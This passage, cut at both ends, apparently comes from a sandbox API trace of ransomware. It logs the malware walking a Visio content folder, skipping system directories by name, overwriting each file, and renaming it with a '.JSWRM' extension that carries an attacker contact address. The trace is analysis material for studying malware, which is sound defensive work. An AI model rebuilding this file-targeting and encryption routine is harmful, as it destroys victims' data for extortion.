Content\\1033\\DBUML_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbuml_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.243] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x318a8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DEPTORGCHART_M.VSTX", cAlternateFileName="DEPTOR~2.VST")) returned 1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2=".") returned 1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="..") returned 1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="...") returned 1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="windows") returned -1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="recovery") returned -1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="perflogs") returned -1 [0147.243] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="documents and settings") returned -1 [0147.244] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.244] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="system volume information") returned -1 [0147.244] lstrcmpiW (lpString1="DEPTORGCHART_M.VSTX", lpString2="msocache") returned -1 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_M.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_M.VSTX", cchWideChar=19, lpMultiByteStr=0x240f98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEPTORGCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 19 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_M.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_M.VSTX", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEPTORGCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 19 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=202920) returned 1 [0147.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.245] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.259] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.259] CloseHandle (hObject=0x314) returned 1 [0147.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.261] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2c0ef, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DEPTORGCHART_U.VSTX", cAlternateFileName="DEPTOR~1.VST")) returned 1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2=".") returned 1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="..") returned 1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="...") returned 1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="windows") returned -1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="recovery") returned -1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="perflogs") returned -1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="documents and settings") returned -1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="system volume information") returned -1 [0147.261] lstrcmpiW (lpString1="DEPTORGCHART_U.VSTX", lpString2="msocache") returned -1 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_U.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_U.VSTX", cchWideChar=19, lpMultiByteStr=0x240f98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEPTORGCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 19 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_U.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEPTORGCHART_U.VSTX", cchWideChar=19, lpMultiByteStr=0x2413a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEPTORGCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 19 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.262] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=180463) returned 1 [0147.262] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.262] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.273] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.274] CloseHandle (hObject=0x314) returned 1 [0147.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DEPTORGCHART_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\deptorgchart_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.275] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x28e4acd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x28e4acd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x28e4acd, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe5cb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DGICON_M.VSSX", cAlternateFileName="DGICON~1.VSS")) returned 1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2=".") returned 1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="..") returned 1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="...") returned 1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="windows") returned -1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="recovery") returned -1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="perflogs") returned -1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="documents and settings") returned -1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="system volume information") returned -1 [0147.275] lstrcmpiW (lpString1="DGICON_M.VSSX", lpString2="msocache") returned -1 [0147.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGICON_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGICON_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.276] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=58827) returned 1 [0147.276] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.277] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe5c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe5c0, lpOverlapped=0x0) returned 1 [0147.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.282] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe5c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe5c0, lpOverlapped=0x0) returned 1 [0147.283] CloseHandle (hObject=0x314) returned 1 [0147.283] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.284] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x318928f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x318928f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x318928f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe258, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DGICON_U.VSSX", cAlternateFileName="DGICON~2.VSS")) returned 1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2=".") returned 1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="..") returned 1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="...") returned 1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="windows") returned -1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="recovery") returned -1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="perflogs") returned -1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="documents and settings") returned -1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="system volume information") returned -1 [0147.284] lstrcmpiW (lpString1="DGICON_U.VSSX", lpString2="msocache") returned -1 [0147.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGICON_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGICON_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGICON_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.286] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=57944) returned 1 [0147.286] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.286] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe250, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe250, lpOverlapped=0x0) returned 1 [0147.291] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.291] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe250, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe250, lpOverlapped=0x0) returned 1 [0147.292] CloseHandle (hObject=0x314) returned 1 [0147.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DGICON_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dgicon_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.293] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1c698, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DIMARC_U.VSSX", cAlternateFileName="DIMARC~1.VSS")) returned 1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2=".") returned 1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="..") returned 1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="...") returned 1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="windows") returned -1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="recovery") returned -1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="perflogs") returned -1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="documents and settings") returned -1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="system volume information") returned -1 [0147.293] lstrcmpiW (lpString1="DIMARC_U.VSSX", lpString2="msocache") returned -1 [0147.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMARC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMARC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMARC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMARC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMARC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMARC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMARC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimarc_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.294] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=116376) returned 1 [0147.294] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.295] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1c690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1c690, lpOverlapped=0x0) returned 1 [0147.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.306] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1c690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1c690, lpOverlapped=0x0) returned 1 [0147.307] CloseHandle (hObject=0x314) returned 1 [0147.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMARC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimarc_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMARC_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimarc_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.309] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f81606, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f81606, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f81606, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1c558, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DIMENG_M.VSSX", cAlternateFileName="DIMENG~1.VSS")) returned 1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2=".") returned 1 [0147.309] lstrcmpiW 